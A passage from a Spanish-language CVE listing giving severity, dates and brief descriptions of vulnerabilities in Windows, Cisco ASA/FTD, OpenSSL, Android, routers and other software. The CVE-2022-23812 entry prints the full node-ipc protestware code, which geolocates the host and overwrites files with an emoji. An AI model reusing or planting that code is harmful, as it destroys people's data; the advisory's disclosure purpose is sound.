    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad en Windows Print Spooler
  • CVE-2021-36953
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Denegación de Servicio de Windows TCP/IP
  • Vulnerabilidad en Storage Spaces Controller de Microsoft (CVE-2021-26441)
    Severidad: MEDIA
    Fecha de publicación: 12/10/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Elevación de Privilegios de Storage Spaces Controller. Este ID de CVE es diferente de CVE-2021-40478, CVE-2021-40488, CVE-2021-40489, CVE-2021-41345
  • CVE-2021-3450
    Severidad: MEDIA
    Fecha de publicación: 25/03/2021
    Fecha de última actualización: 04/08/2023
    El flag X509_V_FLAG_X509_STRICT permite llevar a cabo comprobaciones de seguridad adicionales de los certificados presentes en una cadena de certificados. No está establecido por defecto. A partir de la versión 1.1.1h de OpenSSL, se añadió como comprobación estricta adicional la de no permitir certificados en la cadena que tengan parámetros de curva elíptica codificados explícitamente. Un error en la implementación de esta comprobación significaba que el resultado de una comprobación previa para confirmar que los certificados de la cadena son certificados de CA válidos fueron sobrescritos. De este modo, se omite la comprobación de que los certificados que no son de CA no deben poder emitir otros certificados. Si se ha configurado un "purpose", se presenta la posibilidad de comprobar posteriormente que el certificado es una CA válida. Todos los valores de "purpose" implementados en libcrypto llevan a cabo esta comprobación. Por lo tanto, cuando se establece un propósito, la cadena de certificados seguirá siendo rechazada inclusive cuando se haya usado el flag strict. Se establece un propósito por defecto en las rutinas de verificación de certificados de cliente servidor de libssl, pero puede ser anulado o eliminado por una aplicación. Para que se vea afectada, una aplicación debe establecer explícitamente el flag de verificación X509_V_FLAG_X509_STRICT y no establecer un propósito para la verificación de certificados o, en el caso de las aplicaciones de cliente o servidor TLS, anular el propósito por defecto. Este problema afecta a las versiones 1.1.1h y posteriores de OpenSSL. Los usuarios de estas versiones deben actualizar a OpenSSL versión 1.1.1k. OpenSSL versión 1.0.2 no está afectado por este problema. Corregido en OpenSSL versión 1.1.1k (Afectadas versiones 1.1.1h-1.1.1j)
  • CVE-2021-30807
    Severidad: ALTA
    Fecha de publicación: 19/10/2021
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de corrupción de memoria con un manejo de memoria mejorado. Este problema es corregido en macOS Big Sur versión 11.5.1, iOS versión 14.7.1 y iPadOS versión 14.7.1, watchOS versión 7.6.1. Una aplicación puede ser capaz de ejecutar código arbitrario con privilegios del kernel. Apple tiene conocimiento de un informe que indica que este problema puede haber sido explotado activamente
  • CVE-2021-38295
    Severidad: MEDIA
    Fecha de publicación: 14/10/2021
    Fecha de última actualización: 08/08/2023
    En Apache CouchDB, un usuario malicioso con permiso para crear documentos en una base de datos puede adjuntar un archivo adjunto HTML a un documento. Si un administrador de CouchDB abre ese adjunto en un navegador, por ejemplo, por medio de la interfaz de administración de CouchDB Fauxton, cualquier código JavaScript insertado en ese adjunto HTML se ejecutará dentro del contexto de seguridad de ese administrador. Una ruta similar está disponible con la funcionalidad _show y _list, ya obsoleta. Esta vulnerabilidad de escalada de privilegios permite a un atacante añadir o eliminar datos en cualquier base de datos o realizar cambios de configuración. Este problema afectaba a Apache CouchDB versiones anteriores a 3.1.2
  • CVE-2021-27561
    Severidad: ALTA
    Fecha de publicación: 15/10/2021
    Fecha de última actualización: 08/08/2023
    Yealink Device Management (DM) 3.6.0.20 permite la inyección de comandos como root por medio del URI /sm/api/v1/firewall/zone/services, sin autenticación.
  • CVE-2021-33502
    Severidad: MEDIA
    Fecha de publicación: 24/05/2021
    Fecha de última actualización: 08/08/2023
    El paquete normalize-url versiones anteriores a 4.5.1, versiones 5.x anteriores a 5.3.1 y versiones 6.x anteriores a 6.0.1 para Node.js, presenta un problema de ReDoS (denegación de servicio de expresión regular) porque presenta un rendimiento exponencial para los datos: URL
  • CVE-2021-42576
    Severidad: ALTA
    Fecha de publicación: 18/10/2021
    Fecha de última actualización: 08/08/2023
    bluemonday sanitizer versiones anteriores a 1.0.16 para Go, y versiones anteriores a 0.0.8 para Python (en pybluemonday), no aplica apropiadamente las políticas asociadas a los elementos SELECT, STYLE y OPTION
  • CVE-2021-42299
    Severidad: BAJA
    Fecha de publicación: 20/10/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Omisión de la Funcionalidad de Seguridad en Microsoft Surface Pro 3
  • Vulnerabilidad en la administración de la memoria del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) (CVE-2021-34792)
    Severidad: ALTA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la administración de la memoria del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Esta vulnerabilidad es debido a una administración inapropiada de los recursos cuando las tasas de conexión son altas. Un atacante podría explotar esta vulnerabilidad al abrir un número significativo de conexiones en un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar una recarga del dispositivo, resultando en una condición de DoS
  • Vulnerabilidad en el Normalizador TCP del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) (CVE-2021-34793)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el Normalizador TCP del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) que funciona en modo transparente podría permitir a un atacante remoto no autenticado envenenar las tablas de direcciones MAC, lo que provocaría una vulnerabilidad de denegación de servicio (DoS). Esta vulnerabilidad es debido al manejo incorrecto de determinados segmentos TCP cuando el dispositivo afectado está operando en modo transparente. Un atacante podría explotar esta vulnerabilidad mediante el envío de un segmento TCP diseñado mediante un dispositivo afectado. Una explotación con éxito podría permitir al atacante envenenar las tablas de direcciones MAC en los dispositivos adyacentes, resultando en una interrupción de la red
  • Vulnerabilidad en la funcionalidad access control functionality del Protocolo simple de Administración de Redes versión 3 (SNMPv3) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) (CVE-2021-34794)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la funcionalidad access control functionality del Protocolo simple de Administración de Redes versión 3 (SNMPv3) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado consultar datos SNMP. Esta vulnerabilidad es debido a un control de acceso no eficaz. Un atacante podría explotar esta vulnerabilidad mediante el envío de una consulta SNMPv3 a un dispositivo afectado desde un host que no está permitido por la lista de control de acceso SNMPv3. Una explotación con éxito podría permitir al atacante enviar una consulta SNMP a un dispositivo afectado y recuperar información del dispositivo. El atacante necesitaría credenciales válidas para llevar a cabo la consulta SNMP
  • Vulnerabilidad en el envío de una petición de red en la funcionalidad de procesamiento de reglas del firewall basado en la identidad (IDFW) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) (CVE-2021-34787)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la funcionalidad de procesamiento de reglas del firewall basado en la identidad (IDFW) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado omitir las protecciones de seguridad. Esta vulnerabilidad es debido al manejo inapropiado de las peticiones de red por parte de los dispositivos afectados configurados para usar la búsqueda de grupos de objetos. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de una petición de red especialmente diseñada a un dispositivo afectado. Una explotación con éxito podría permitir al atacante omitir las reglas de la lista de control de acceso (ACL) en el dispositivo, omitir las protecciones de seguridad y enviar tráfico de red a hosts no autorizados
  • Vulnerabilidad en los paquetes SSL/TLS en el administrador de mensajes SSL/TLS para el software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) (CVE-2021-40117)
    Severidad: ALTA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el administrador de mensajes SSL/TLS para el software Cisco Adaptive Security Appliance (ASA) y el software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Esta vulnerabilidad se presenta porque los paquetes SSL/TLS entrantes no se procesan correctamente. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de un paquete SSL/TLS diseñado a un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar una recarga del dispositivo afectado, resultando en una condición de DoS
  • Vulnerabilidad en la implementación del Intercambio de Claves de Internet Versión 2 (IKEv2) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) (CVE-2021-40125)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la implementación del Intercambio de Claves de Internet Versión 2 (IKEv2) del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) podría permitir a un atacante remoto autenticado desencadenar una condición de denegación de servicio (DoS) en un dispositivo afectado. Esta vulnerabilidad es debido a un control inapropiado de un recurso. Un atacante con la capacidad de falsificar un peer IKEv2 site-to-site VPN confiable y en posesión de credenciales IKEv2 válidas para ese peer podría explotar esta vulnerabilidad mediante el envío de mensajes IKEv2 malformados y autenticados a un dispositivo afectado. Una explotación con éxito podría permitir al atacante desencadenar una recarga del dispositivo
  • Vulnerabilidad en la Puerta de Enlace de Nivel de Aplicación (ALG) para la funcionalidad Network Address Translation (NAT) del software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD) (CVE-2021-34791)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Varias vulnerabilidades en la Puerta de Enlace de Nivel de Aplicación (ALG) para la funcionalidad Network Address Translation (NAT) del software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD) podrían permitir a un atacante remoto no autenticado omitir la ALG y abrir conexiones no autorizadas con un host situado detrás de la ALG. Para conseguir más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso. Nota: Estas vulnerabilidades se han discutido públicamente como NAT Slipstreaming
  • Vulnerabilidad en la Puerta de Enlace de Nivel de Aplicación (ALG) para la funcionalidad Network Address Translation (NAT) del software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD) (CVE-2021-34790)
    Severidad: MEDIA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Varias vulnerabilidades en la Puerta de Enlace de Nivel de Aplicación (ALG) para la funcionalidad Network Address Translation (NAT) del software Cisco Adaptive Security Appliance (ASA) y el software Firepower Threat Defense (FTD) podrían permitir a un atacante remoto no autenticado omitir el ALG y abrir conexiones no autorizadas con un host situado detrás del ALG. Para conseguir más información sobre estas vulnerabilidades, consulte la sección Detalles de este aviso. Nota: Estas vulnerabilidades han sido discutidas públicamente como NAT Slipstreaming
  • Vulnerabilidad en el administrador de mensajes SSL/TLS basado en software del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) (CVE-2021-34783)
    Severidad: ALTA
    Fecha de publicación: 27/10/2021
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en el administrador de mensajes SSL/TLS basado en software del software Cisco Adaptive Security Appliance (ASA) y del software Firepower Threat Defense (FTD) podría permitir a un atacante remoto no autenticado causar la recarga de un dispositivo afectado, resultando en una condición de denegación de servicio (DoS). Esta vulnerabilidad es debido a la insuficiente comprobación de los mensajes SSL/TLS cuando el dispositivo lleva a cabo el descifrado SSL/TLS basado en software. Un atacante podría aprovechar esta vulnerabilidad mediante el envío de un mensaje SSL/TLS diseñado a un dispositivo afectado. Una explotación con éxito podría permitir al atacante causar la recarga del dispositivo afectado, resultando en una condición de DoS. Nota: Los mensajes TLS de datagrama (DTLS) no pueden ser usados para explotar esta vulnerabilidad
  • CVE-2019-1706
    Severidad: ALTA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el módulo de programa de cryptography module of the Cisco Adaptive Security Virtual Appliance (ASAv) y Firepower versión 2100 Series que ejecuta Cisco Adaptive Security Appliance (ASA) el programa podría permitir que un atacante remoto no autenticado provoque una recarga inesperada del dispositivo que provoque una condición de denegación de servicio (DoS). La vulnerabilidad se debe a un error lógico en la forma en que el módulo de criptografía del programa maneja las sesiones IPsec. Un atacante podría explotar esta vulnerabilidad creando y enviando tráfico en un gran número de sesiones IPsec a través del dispositivo objetivo. Un exploit con éxito podría causar que el dispositivo se recargue y resulte en una condición de denegación de servicio (DoS).
  • CVE-2019-1708
    Severidad: ALTA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la característica del Internet Key Exchange Version 2 Mobility and Multihoming Protocol (MOBIKE) (Cisco Mobility) para el programa ASA (Cisco Adaptive Security Appliance) y el programa Cisco Firepower Threat Defense (FTD) podría permitir que un atacante remoto no autenticado provoque una pérdida de memoria o recarga de un dispositivo afectado que lleva a una condición de denegación de servicio (DoS). La vulnerabilidad se debe al procesamiento inapropiado de ciertos paquetes MOBIKE. Un atacante podría explotar esta vulnerabilidad enviando paquetes MOBIKE creados a un dispositivo afectado para procesarlos. Una explotación con éxito podría hacer que un dispositivo afectado consumiera memoria continuamente y finalmente se recargara, resultando en una condición DoS. La función MOBIKE solo es compatible con direcciones IPv4.
  • CVE-2021-22406
    Severidad: MEDIA
    Fecha de publicación: 28/10/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de Excepción No Capturada en Huawei Smartphone. Una explotación con éxito de esta vulnerabilidad causará una salida no esperada de la aplicación
  • CVE-2021-38647
    Severidad: ALTA
    Fecha de publicación: 15/09/2021
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota de Open Management Infrastructure
  • CVE-2021-43270
    Severidad: MEDIA
    Fecha de publicación: 02/11/2021
    Fecha de última actualización: 08/08/2023
    Datalust Seq.App.HtmlEmail (también se conoce como Seq.App.EmailPlus) versiones 3.1.0-dev-00148, 3.1.0-dev-00170, y 3.1.0-dev-00176, puede usar SMTP en texto sin cifrar en el puerto 25 en algunos casos en los que se pretendía el cifrado en el puerto 465
  • CVE-2021-40985
    Severidad: MEDIA
    Fecha de publicación: 03/11/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de desbordamiento del búfer under-read en htmldoc versiones anteriores a 1.9.12, permite a atacantes causar una denegación de servicio por medio de una imagen BMP diseñada a la función image_load_bmp.
  • CVE-2021-43414
    Severidad: MEDIA
    Fecha de publicación: 07/11/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GNU Hurd versiones anteriores a 0.9 20210404-9. El uso de un protocolo de autenticación en el servidor proc es vulnerable a unos ataques de tipo man-in-the-middle, que pueden ser explotados para la escalada de privilegios local para conseguir acceso completo a la root
  • CVE-2021-43404
    Severidad: MEDIA
    Fecha de publicación: 05/11/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en FusionPBX versiones anteriores a 4.5.30. El nombre del archivo FAX puede tener caracteres de riesgo
  • CVE-2021-43405
    Severidad: MEDIA
    Fecha de publicación: 05/11/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en FusionPBX versiones anteriores a 4.5.30. El fax_extension puede tener caracteres de riesgo (no está restringido a ser numérico)
  • CVE-2021-35368
    Severidad: ALTA
    Fecha de publicación: 05/11/2021
    Fecha de última actualización: 08/08/2023
    OWASP ModSecurity Core Rule Set versiones 3.1.x anteriores a 3.1.2, 3.2.x anteriores a 3.2.1 y 3.3.x anteriores a 3.3.2, está afectado por un desvío del cuerpo de la petición por medio de un nombre de ruta final
  • CVE-2022-22947
    Severidad: MEDIA
    Fecha de publicación: 03/03/2022
    Fecha de última actualización: 24/07/2023
    En spring cloud gateway versiones anteriores a 3.1.1+ y a 3.0.7+ , las aplicaciones son vulnerables a un ataque de inyección de código cuando el endpoint del Actuador de la Puerta de Enlace está habilitado, expuesto y sin seguridad. Un atacante remoto podría realizar una petición maliciosamente diseñada que podría permitir una ejecución remota arbitraria en el host remoto
  • CVE-2021-4083
    Severidad: MEDIA
    Fecha de publicación: 18/01/2022
    Fecha de última actualización: 04/08/2023
    Se ha encontrado un fallo de lectura de memoria previamente liberada en la recolección de basura del kernel de Linux para los manejadores de archivos de socket de dominio Unix en la forma en que los usuarios llaman a close() y fget() simultáneamente y puede potencialmente desencadenar una condición de carrera. Este fallo permite a un usuario local bloquear el sistema o escalar sus privilegios en el sistema. Este fallo afecta a las versiones del kernel de Linux anteriores a la 5.16-rc4
  • CVE-2022-20049
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    En vpu, se presenta una posible escalada de privilegios debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS05954679; ID de Incidencia: ALPS05954679
  • CVE-2022-20053
    Severidad: ALTA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    En ims service, se presenta una posible escalada de privilegios debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada de privilegios local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS06219097; ID de Incidencia: ALPS06219097
  • CVE-2021-44734
    Severidad: ALTA
    Fecha de publicación: 20/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el saneo de entradas del servidor web integrado en los dispositivos Lexmark versiones hasta 07-12-2021, que puede conllevar a una ejecución de código remota en el dispositivo
  • CVE-2022-20054
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    En ims service, se presenta una posible inyección de comandos AT debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del parche: ALPS06219083; ID de Incidencia: ALPS06219083
  • CVE-2022-26526
    Severidad: MEDIA
    Fecha de publicación: 17/03/2022
    Fecha de última actualización: 08/08/2023
    Anaconda Anaconda3 (Anaconda Distribution) hasta 2021.11.0.0 y Miniconda3 hasta 4.11.0.0 pueden crear un directorio escribible en el mundo bajo %PROGRAMDATA% y colocar ese directorio en la variable de entorno PATH del sistema. Así, por ejemplo, los usuarios locales pueden obtener privilegios colocando un archivo troyano en ese directorio. (Este problema sólo puede ocurrir en una instalación no predeterminada. La persona que instala el producto debe especificar que se está instalando para todos los usuarios. Además, la persona que instala el producto debe especificar que el PATH del sistema debe ser cambiado
  • CVE-2022-25219
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un error de interacción de bytes nulos en el código que el demonio telnetd_startup usa para construir un par de contraseñas efímeras que permiten a un usuario generar un servicio de telnet en el router, y para asegurar que el servicio de telnet persiste tras el reinicio. Por medio de un intercambio diseñado de paquetes UDP, un atacante no autenticado en la red local puede aprovechar este error de interacción de bytes nulos de tal manera que haga que esas contraseñas efímeras sean predecibles (con una probabilidad de 1 en 94). Dado que el atacante debe manipular los datos procesados por la función RSA_public_decrypt() de OpenSSL, una explotación con éxito de esta vulnerabilidad depende del uso de un cifrado RSA sin relleno (CVE-2022-25218)
  • CVE-2022-25218
    Severidad: ALTA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    El uso del algoritmo RSA sin OAEP, o cualquier otro esquema de relleno, en telnetd_startup, permite a un atacante no autenticado en la red de área local lograr un grado significativo de control sobre "texto plano" al que un blob arbitrario de texto cifrado será descifrado por la función RSA_public_decrypt() de OpenSSL. Esta debilidad permite al atacante manipular las diversas iteraciones de la máquina de estado de inicio de telnetd y eventualmente obtener un shell de root en el dispositivo, mediante un intercambio de paquetes UDP diseñados. En todas las versiones excepto K2 22.5.9.163 y K3C 32.1.15.93 un ataque con éxito también requiere la explotación de un error de interacción de byte nulo (CVE-2022-25219)
  • CVE-2022-25215
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en la interfaz LocalMACConfig.asp permite a un atacante remoto no autenticado añadir (o eliminar) direcciones MAC de clientes a (o desde) una lista de hosts prohibidos. Los clientes con esas direcciones MAC no pueden acceder a la WAN o al propio router
  • CVE-2022-25214
    Severidad: MEDIA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso inapropiado en la interfaz LocalClientList.asp permite a un atacante remoto no autenticado obtener información confidencial sobre los dispositivos de la red de área local, incluyendo las direcciones IP y MAC. El control de acceso inapropiado en la interfaz wirelesssetup.asp permite a un atacante remoto no autenticado obtener las frases de acceso WPA para las redes inalámbricas de 2,4 y 5,0 GHz. Esto es particularmente peligroso dado que el asistente de configuración de K2G presenta al usuario la opción de usar la misma contraseña para la red de 2,4Ghz y la interfaz administrativa, haciendo clic en una casilla de verificación. Cuando la Administración Remota está habilitada, estos endpoints están expuestos a la WAN
  • CVE-2022-25213
    Severidad: ALTA
    Fecha de publicación: 10/03/2022
    Fecha de última actualización: 08/08/2023
    Un control de acceso físico inapropiado y el uso de credenciales embebidas en /etc/passwd permite a un atacante con acceso físico obtener un shell de root por medio de un puerto UART desprotegido en el dispositivo. El mismo puerto expone un shell Das U-Boot BIOS no autenticado
  • CVE-2022-26501
    Severidad: ALTA
    Fecha de publicación: 17/03/2022
    Fecha de última actualización: 08/08/2023
    Veeam Backup & Replication versiones 10.x y 11.x, presenta un Control de Acceso Incorrecto (problema 1 de 2)
  • CVE-2022-23812
    Severidad: ALTA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    Esto afecta al paquete node-ipc a partir de la versión 10.1.1 y versiones anteriores a 10.1.3. Este paquete contiene un código malicioso, que es dirigido a usuarios con IP ubicadas en Rusia o Bielorrusia, y sobrescribe sus archivos con un emoji de corazón. **Nota**: a partir de las versiones 11.0.0, en lugar de tener código malicioso directamente en el código fuente de este paquete, node-ipc importa el paquete peacenotwar que incluye un comportamiento potencialmente no deseado. Código Malicioso: **Nota:** ¡No lo ejecutes! js importado desde "path"; importado desde "fs"; importado desde "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer. from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t. on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer. from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer. from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // comprueba si el país es Rusia o Bielorrusia if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a. readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u. join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // sobrescribe el archivo con ? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
  • CVE-2021-39715
    Severidad: BAJA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En la función __show_regs del archivo process.c, se presenta una posible pérdida de memoria y direcciones del kernel debido a una divulgación de información de registro. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución System necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-178379135, Referencias: kernel Ascendente
  • CVE-2021-39712
    Severidad: MEDIA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En TBD de TBD, se presenta una posible vulnerabilidad de uso de memoria previamente liberada debido a una condición de carrera. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-176918884, Referencias: N/A
  • CVE-2021-39708
    Severidad: ALTA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En la función gatt_process_notification del archivo gatt_cl.cc, se presenta una posible escritura fuera de límites debido a una comprobación de límites incorrecta. Esto podría conllevar a una escalada de privilegios remota sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12, ID de Android: A-206128341
  • CVE-2021-39693
    Severidad: ALTA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En la función onUidStateChanged del archivo AppOpsService.java, se presenta una posible forma de acceder a la ubicación sin un indicador visible debido a un error lógico en el código. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12, ID de Android: A-208662370
  • CVE-2021-39690
    Severidad: MEDIA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En la función setDisplayPadding del archivo WallpaperManagerService.java, se presenta una posible forma de causar un DoS persistente debido a una comprobación de entrada inapropiada. Esto podría conllevar a una denegación de servicio local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12, ID de Android: A-204316511
  • CVE-2021-0957
    Severidad: ALTA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    En la función NotificationStackScrollLayout del archivo NotificationStackScrollLayout.java, se presenta una posible forma de omitir las protecciones de restablecimiento de fábrica. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12, ID de Android: A-193149550
  • CVE-2021-43955
    Severidad: MEDIA
    Fecha de publicación: 16/03/2022
    Fecha de última actualización: 08/08/2023
    El recurso /rest-service-fecru/server-v1 en Fisheye y Crucible versiones anteriores a 4.8.9, permitía a atacantes remotos autenticados obtener información sobre los directorios de instalación por medio de una vulnerabilidad de divulgación de información
  • CVE-2021-2351
    Severidad: MEDIA
    Fecha de publicación: 21/07/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el componente Advanced Networking Option de Oracle Database Server. Las versiones compatibles que están afectadas son 12.1.0.2, 12.2.0.1 y 19c. Una vulnerabilidad difícil de explotar permite a un atacante no autenticado con acceso a la red por medio de Oracle Net comprometer a advanced Networking Option. Los ataques con éxito requieren una interacción humana de una persona diferente del atacante y, mientras la vulnerabilidad se encuentra en Advanced Networking Option, los ataques pueden afectar significativamente a productos adicionales. Los ataques con éxito de esta vulnerabilidad pueden resultar en la toma de control de Advanced Networking Option. Nota: La actualización de parches críticos de julio de 2021 introduce una serie de cambios en el Cifrado de Red Nativo para hacer frente a la vulnerabilidad (CVE-2021-2351 y prevenir el uso de cifrados más débiles. Los clientes deben revisar: "Changes in Native Network Encryption with the July 2021 Critical Patch Update" (Doc ID 2791571.1). CVSS 3.1 Puntuación Base 8.3 (Impactos en la Confidencialidad, Integridad y Disponibilidad). Vector CVSS: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)
  • CVE-2022-21895
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows User Profile Service. Este ID de CVE es diferente de CVE-2022-21919
  • CVE-2022-21896
    Severidad: MEDIA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows DWM Core Library. Este ID de CVE es diferente de CVE-2022-21852, CVE-2022-21902
  • CVE-2021-36411
    Severidad: MEDIA
    Fecha de publicación: 10/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha encontrado un problema en libde265 versión v1.0.8, debido a un control de acceso incorrecto. Se ha producido un SEGV causado por un acceso de memoria READ en la función derive_boundaryStrength del archivo deblock.cc. La vulnerabilidad causa un fallo de segmentación y el bloqueo de la aplicación, que conlleva a una denegación de servicio remota
  • CVE-2022-21882
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Win32k. Este ID de CVE es diferente de CVE-2022-21887
  • Vulnerabilidad en el envío de una petición HTTPS en la interfaz de servicios web del software Cisco Adaptive Security Appliance (ASA) y del software Cisco Firepower Threat Defense (FTD) (CVE-2021-1573)
    Severidad: ALTA
    Fecha de publicación: 11/01/2022
    Fecha de última actualización: 16/08/2023
